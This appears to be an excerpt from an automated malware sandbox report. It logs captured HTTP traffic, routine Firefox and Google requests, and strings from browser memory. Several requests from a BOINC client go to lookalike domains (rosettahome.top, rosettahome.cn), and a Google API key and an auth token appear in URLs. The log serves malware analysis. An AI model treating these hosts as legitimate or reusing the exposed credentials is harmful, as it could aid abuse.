91 dd 27 96 7d c8 71 dd f5 38 f6 1d 80 3d b5 e6 49 fe 6e 10 93 4f 83 81 6b 10 3f e8 25 ed 1e 59 c7 b4 a8 78 cf b5 2d a9 92 25 70 2a 70 f1 39 28 8a 4a 72 8a 6b e8 02 ec 21 e3 ec c7 11 3b 0c f7 c9 8b 1e 5b 9c 39 eb a8 bf 56 6e cc ce 70 cf ef 2b ad fc e6 cf d4 9f 27 2a ed d8 5f 09 00 00 Data Ascii: V6+9Cr@T/-qd0XKUn]F
Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 14 Jan 2025 19:46:43 GMTServer: Apache/2.4.52 (Ubuntu)Expires: Tue, 14 Jan 2025 19:46:43 GMTLast-Modified: Tue, 14 Jan 2025 19:46:43 GMTVary: Accept-EncodingContent-Encoding: gzipContent-Length: 232Content-Type: application/xmlData Raw: 1f 8b 08 00 00 00 00 00 00 03 65 50 db 6e c2 30 0c 7d df 57 58 7d 1e 84 96 32 41 55 82 80 55 03 34 2e 62 95 f6 1c a5 d6 1a 2d 38 a8 31 68 9f bf 0a 36 35 d3 fc 76 ec 73 b1 9d cf be 4e 16 ae d8 78 e3 68 1a c5 fd 41 04 48 da 55 86 3e a6 d1 fa 6d df 1b 8f 47 93 5e 1c c1 4c 3e c0 4f e5 8d f7 9d 26 69 35 c1 4c d7 8a 08 6d d0 61 c3 16 e5 b1 38 bc ce 97 05 bc af cb 15 1c 8e fb 4d b1 2c 61 37 df 16 40 8e 8d 46 9f 8b 3b b1 13 5a 43 9f b2 66 3e 67 42 34 ce 23 b3 aa dd 09 fb 9a 42 28 72 71 23 76 ba 0a bd 6e cc 99 db f5 e4 ee d7 3c 6c 06 11 ca f3 e2 62 6c f5 ac 18 65 79 c1 47 88 53 d8 28 82 64 90 8c 20 9e 64 e9 53 96 0e e1 65 5b b6 31 7f c8 37 93 ce 49 fc 3f 5c b4 7f ba c3 6f 83 96 3a d0 67 01 00 00 Data Ascii: ePn0}WX}2AUU4.b-81h65vsNxhAHU>mG^L>O&i5Lma8M,a7@F;ZCf>gB4#B(rq#vn<lbleyGS(d dSe[17I?\o:g
Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 14 Jan 2025 19:46:48 GMTServer: Apache/2.4.52 (Ubuntu)Expires: Mon, 26 Jul 1997 05:00:00 UTCLast-Modified: Tue, 14 Jan 2025 19:46:48 UTCCache-Control: no-cache, must-revalidate, post-check=0, pre-check=0Pragma: no-cacheVary: Accept-EncodingContent-Encoding: gzipContent-Length: 1512Content-Type: text/html; charset=utf-8Data Raw: 1f 8b 08 00 00 00 00 00 00 03 cd 19 5d 73 d3 38 f0 bd bf 42 18 ee 5e 38 c7 49 e1 3e e8 39 61 7a a1 43 cb 94 36 d3 16 18 ee 25 a3 d8 1b 5b 45 b6 74 92 dc 90 fb f5 b7 92 ed c4 4e 93 52 38 33 25 d3 c4 96 b4 da ef 5d ad b6 e1 a3 57 e7 e3 ab 8f 93 23 92 9a 8c 8f f6 48 f5 09 ed 90 70 9a 27 43 0f 72 af b9 00 34 2e 87 eb b9 0c 0c 25 39 cd 60 e8 dd 30 58 48 a1 8c 47 22 91 1b c8 cd d0 5b b0 d8 a4 c3 18 6e 58 04 be 1b fc 42 58 ce 0c a3 dc d7 11 e5 30 1c 54 04 f6 c2 47 be 4f 42 1d a5 10 17 1c d4 28 35 46 1e 04 81 12 1a 8c a1 a9 c8 a0 67 84 6c 8e a7 51 c2 02 fc 86 c1 7a 17 f1 fd d1 5e c8 59 fe 89 28 e0 43 6f 26 58 1e 4d 57 eb 1e 49 15 cc 87 de fd 91 37 e5 37 cc 70 18 5d 1c 4d 4e 0f c7 47 e4 c3 c9 d5 31 99 5c 9c bf 39 1a 5f 91 b3 c3 b7 47 61 50 02 ec 6d 68 27 4a a9 42 bc 43 af 30 73 ff 0f 6f 43 83 0e ce 31 6c 96 12 b5 68 e0 b3 09 22 ad bd 52 00 6d 96 1c 74 0a 60 ee e0 3d ca 9b c3 20 98 09 61 b4 51 54 f6 32 96 f7 1c b2 0c 62 46 87 1e e5 bc 21 d1 5e 9b 01 4b 90 72 03 2a a7 06 2a 76 a8 94 9c 45 d4 30 81 34 b4 7e fa 39 e3 1e 71 72 0e bd 8b cb 4b b2 df eb df 9f 31 44 30 cd 28 b2 24 53 d9 54 6c b0 f6 ac 70 26 e2 25 19 95 ee 70 f9 fe 8c bc 3f ba b8 3c 39 3f bb 2c 2d 6b 67 9f 9c c4 4f 5a a3 03 22 b3 1e da 99 0c 9e f7 07 2f c8 7e bf ff bb 3f 18 f8 fd 01 d9 7f 76 d0 7f 7e f0 ec c5 df 24 a6 37 40 c9 93 3b b0 74 3a 8a d9 0d 89 38 d5 7a e8 d9 60 40 99 41 f9 73 5e b0 b8 92 3b 64 59 52 43 e0 ab af 40 4b 91 6b 76 03 1e 71 36 af 82 e7 60 d0 ef ff 84 53 2a 72 70 c1 02 4d a3 7a d7 32 f1 46 61 4e 57 44 f0 75 46 15 29 1f 7e 0c 73 5a 70 e3 39 57 bc 07 2f 0d 88 0a 83 35 08 86 4b 6d a3 70 56 18 23 f2 ca 27 ca 81 b7 b1 c5 88 24 e1 c8 7d 4c 0d ad 06 96 20 e7 54 ea d5 34 55 89 8d 84 c7 d9 f2 cc ed 6a 7a 81 96 34 5f a9 04 39 f5 dd 3a 46 37 ce 7f 1f b0 30 28 45 59 8d e9 86 4c 33 45 f3 b8 f2 ef 2f bb f7 5d a9 81 56 aa 0e 50 d7 b7 b5 5e ab a9 36 e0 5a 6d 2c 1e 7a b7 94 15 16 bc c1 68 bd 09 1f ed e4 82 51 5d 83 c5 4a c8 58 2c 5a e9 9c 6e 2e 6e 37 e1 6a 6b 15 e6 8f bd d1 44 89 6b 88 cc 76 65 47 54 61 b2 aa 35 bd 92 7c 83 ef 15 cd 0c f2 a2 f6 43 ce 46 c8 d5 7d b3 09 9d 89 c2 94 a9 e4 d0 be 92 3b d5 1f 06 88 7d 33 eb 7e 0d b9 05 f0 c8 4e 3b 82 c7 c0 e5 76 ac 8d ac 56 f0 b5 a3 d5 60 df db 34 63 91 c9 c2 b0 3c 79 60 e3 48 84 d3 56 57 2f 75 31 b3 a7 5f c2 c5 8c 72 eb 3b 30 07 05 79 04 ba 13 b3 68 50 37 a0 a6 da 50 53 e8 d2 38 97 6e 8a 94 53 dd 10 41 54 15 f2 b1 c2 93 d4 38 e4 4c 1b 16 75 43 00 8f d9 0a ff e1 fa c0 ed 06 75 22 8b 29 47 56 4b f4 af 27 ef 48 26 62 e0 dd 20 8f 5a c8 c7 dd 22 4f 85 36 d3 a6 ea 9d 6f a3 65 ed 31 b4 83 c4 c3 87 5f 56 60 81 bb 7c e0 f0 9b 0b 55 64 53 96 c7 f0 b9 d4 dd 5b d0 9a Data Ascii:
Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 14 Jan 2025 19:46:56 GMTServer: Apache/2.4.52 (Ubuntu)Vary: Accept-EncodingContent-Encoding: gzipContent-Length: 691Content-Type: text/xmlData Raw: 1f 8b 08 00 00 00 00 00 00 03 a5 55 b9 92 9c 30 10 cd f9 0a 95 03 87 8b 80 81 11 2e 2d 0e 1c bb ca 91 ab 1c 51 42 6a 16 bc 80 b0 24 e6 f8 7b 37 c7 ec c0 8e c7 d7 2a 52 5f 7a fd 9a ee 86 5b 59 81 1a 1a 30 b9 81 be 39 67 1e bf 6a 0e 60 6c ad bb 8c d1 80 fb b7 6a 8f 2b dd b9 7c b0 90 2b 59 fa 28 b7 c2 3a 74 18 4c 93 55 ce f5 1f 7c df 68 0b ce 89 4a b7 f0 20 bb b5 e8 73 7f e5 ee 71 03 3f 06 b0 2e 57 d0 88 73 16 3e d0 e9 70 7f ab 47 0c b0 56 3c 01 e9 4d ad 4d ed ce 8f ef 1a 7d 7c 97 7d 31 fa 3b 48 47 2a 61 49 a7 89 13 f6 d9 12 71 10 75 23 8a 06 10 6b 0e c3 07 fa d9 33 ef 44 0b d9 2a 21 ee 6f 2c 1e ef e0 e4 72 d3 cb 05 3a a2 f4 25 a9 57 26 8f 63 11 4c ad 32 ac d3 72 9b 55 1b 10 87 34 66 fb 05 61 ba 3b ed 44 93 4b 03 aa 76 d9 15 e2 d6 b6 f8 c3 a9 17 87 a7 3b 01 5b e3 12 81 12 82 e7 ae 46 d0 60 1f b0 5d 9c a6 34 5d 22 d6 46 8f 43 8b 15 cb b1 88 55 06 4a a5 ac 90 69 b1 57 65 52 4a a0 49 c0 58 10 83 a2 51 24 12 26 b8 bf 72 f6 b8 44 96 36 bf 94 10 2b 10 ee 15 65 41 52 c2 7e 1f ef ca 44 c5 2c 8e 22 95 26 50 a8 b4 88 d2 98 fb 37 21 88 7f c2 8e e8 46 ce 3d ca 65 14 52 46 25 65 7b 41 cb 60 1f 52 1a ed 53 c9 62 06 ac d8 45 22 c2 14 36 fe 9e c7 2b 8d bd 72 a7 a4 b7 b6 c5 ff 5e 49 7f 61 5c 22 0e d0 0d 90 2d 1e b3 b0 58 b6 c5 8e 12 c6 76 74 9c 9f 1b a3 c7 1d 88 76 6e 05 ee 5f ef 1e 7f 1a ea 71 28 6c e6 11 3c 17 71 96 26 cd e4 f7 79 19 84 42 0b a3 2c f6 e4 14 fc e2 a3 c0 4a 53 f7 6e 9c d4 4f da 18 b0 bd ee 14 39 d6 ae 22 da 55 60 c8 f8 f9 2d d1 1d 41 89 ac 06 81 b4 af 5e 5e 3f 75 05 f8 bb 29 2f b5 19 da bc ee 14 9c 1e fa aa c7 a6 bb 30 e1 fe 86 d8 3d 9a df f4 60 88 90 52 0f 9d fb 2d c9 af 35 1c c9 79 e5 4d ea 0e d1 5b 31 5a df 46 62 d2 fd 7f f6 d3 32 fa 73 ee e3 67 68 70 25 92 23 c0 33 d1 86 58 4d 74 49 a4 6e fb c1 4d 2c 44 43 8e da 3c bf 8d 0c 76 c2 d0 38 3b f2 f9 38 2f ab c7 e0 3e 31 ef 45 b6 e3 92 c6 79 2d 01 d4 a5 35 2f f2 3f 27 d1 69 57 4b d8 26 f1 5e 0c ae 7a 0c f2 40 44 49 58 84 42 c5 34 65 31 84 34 c2 8d 55 c2 6e 97 b0 90 e2 fe 58 25 3b 21 f6 ba 69 b0 c3 70 11 1c 44 93 b1 64 37 8e ee 56 b9 30 bb a6 7b bd 8f b4 fc 9b bf e0 4f 2c de c6 04 18 07 00 00 Data Ascii: U0.-QBj${7*R_z[Y09gj`lj+|+Y(:tLU|hJ sq?.Ws>pGV<MM}|}1;HG*aIqu#k3D*!o,r:%W&cL2rU4fa;DKv;[F`]4]"FCUJiWeRJIXQ$&rD6+eAR~D,"&P7!F=eRF%e{A`RSbE"6+r^Ia\"-Xvtvn_q(l<q&yB,JSnO9"U`-A^^?u)/0=`R-5yM[1ZFb2sghp%#3XMtInM,DC<v8;8/>1Ey-5/?'iWK&^z@DIXB4e14UnX%;!ipDd7V0{O,
Source: global trafficHTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIlaHLAQj2mM0BCIWgzQEI3L3NAQiSys0BCLnKzQEIx9HNAQiJ080BCNzTzQEIy9bNAQj01s0BCIrXzQEIp9jNAQj5wNQVGLrSzQEYy9jNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIlaHLAQj2mM0BCIWgzQEI3L3NAQiSys0BCLnKzQEIx9HNAQiJ080BCNzTzQEIy9bNAQj01s0BCIrXzQEIp9jNAQj5wNQVGLrSzQEYy9jNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /async/newtab_promos HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global trafficHTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global trafficHTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global trafficHTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global trafficHTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global trafficHTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global trafficHTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global trafficHTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global trafficHTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global trafficHTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global trafficHTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global trafficHTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global trafficHTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global trafficHTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global trafficHTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global trafficHTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global trafficHTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /rosettahome/ HTTP/1.1Host: rosettahome.topUser-Agent: BOINC client (windows_x86_64 8.0.2)Accept: */*Accept-Encoding: deflate, gzip
Source: global trafficHTTP traffic detected: GET /rosettahome/notices.php?userid=1&auth=1_1a362b2ad50985e203845fe44682096e HTTP/1.1Host: rosettahome.cnUser-Agent: BOINC client (windows_x86_64 8.0.2)Accept: */*Accept-Encoding: deflate, gzip
Source: global trafficHTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global trafficHTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /rosettahome/ HTTP/1.1Host: rosettahome.cnUser-Agent: BOINC client (windows_x86_64 8.0.2)Accept: */*Accept-Encoding: deflate, gzip
Source: firefox.exe, 00000003.00000003.1634791308.000036FD10303000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: *://www.facebook.com/*Z equals www.facebook.com (Facebook)
Source: firefox.exe, 00000003.00000003.1634791308.000036FD10303000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: www.facebook.comZ equals www.facebook.com (Facebook)
Source: firefox.exe, 00000003.00000003.1634791308.000036FD10303000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1518246632.000001CA1B33C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: *://www.facebook.com/* equals www.facebook.com (Facebook)
Source: firefox.exe, 00000003.00000003.1634791308.000036FD10303000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: *://www.facebook.com/*Z equals www.facebook.com (Facebook)
Source: firefox.exe, 00000003.00000003.2027390218.000001CA0CE7A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.2105394117.000001CA0CE80000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.2105394117.000001CA0CE77000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: *://www.facebook.com/platform/impression.php* equals www.facebook.com (Facebook)
Source: firefox.exe, 00000003.00000003.1524889211.000001CA7FE5E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: -l10n-id="newtab-menu-content-tooltip" data-l10n-args="{&quot;title&quot;:&quot;Wikipedia&quot;}" class="context-menu-button icon"></button></div><div class="topsite-impression-observer"></div></div></li><li class="top-site-outer"><div class="top-site-inner"><a class="top-site-button" href="https://www.reddit.com/" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper" data-fallback="R"><div class="top-site-icon rich-icon" style="background-image:url(chrome://activity-stream/content/data/content/tippytop/images/reddit-com@2x.png)"></div></div></div><div class="title"><span dir="auto">Reddit<span class="sponsored-label" data-l10n-id="newtab-topsite-sponsored"></span></span></div></a><div><button aria-haspopup="true" data-l10n-id="newtab-menu-content-tooltip" data-l10n-args="{&quot;title&quot;:&quot;Reddit&quot;}" class="context-menu-button icon"></button></div><div class="topsite-impression-observer"></div></div></li><li class="top-site-outer hide-for-narrow"><div class="top-site-inner"><a class="top-site-button" href="https://twitter.com/" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper" data-fallback="T"><div class="top-site-icon rich-icon" style="background-image:url(chrome://activity-stream/content/data/content/tippytop/images/twitter-com@2x.png)"></div></div></div><div class="title"><span dir="auto">Twitter<span class="sponsored-label" data-l10n-id="newtab-topsite-sponsored"></span></span></div></a><div><button aria-haspopup="true" data-l10n-id="newtab-menu-content-tooltip" data-l10n-args="{&quot;title&quot;:&quot;Twitter&quot;}" class="context-menu-button icon"></button></div><div class="topsite-impression-observer"></div></div></li><li class="top-site-outer placeholder hide-for-narrow"><div class="top-site-inner"><a class="top-site-button" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper"><div class=""></div></div></div><div class="title"><span dir="auto"><br/><span class="sponsored-label" data-l10n-id="newtab-topsite-sponsored"></span></span></div></a><button aria-haspopup="dialog" class="context-menu-button edit-button icon" data-l10n-id="newtab-menu-topsites-placeholder-tooltip"></button><div class="topsite-impression-observer"></div></div></li></ul><div class="edit-topsites-wrapper"></div></div></section></div></div></div></div><style data-styles="[[null]]"></style></div><div class="discovery-stream ds-layout"><div class="ds-column ds-column-12"><div class="ds-column-grid"><div></div></div></div><style data-styles="[[null]]"></style></div></div></main></div></div> equals www.twitter.com (Twitter)
Source: firefox.exe, 00000003.00000003.1528174370.000001CA1B18E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1616308895.000001CA1B229000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1690517734.000001CA1B24C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: 8*://www.facebook.com/* equals www.facebook.com (Facebook)
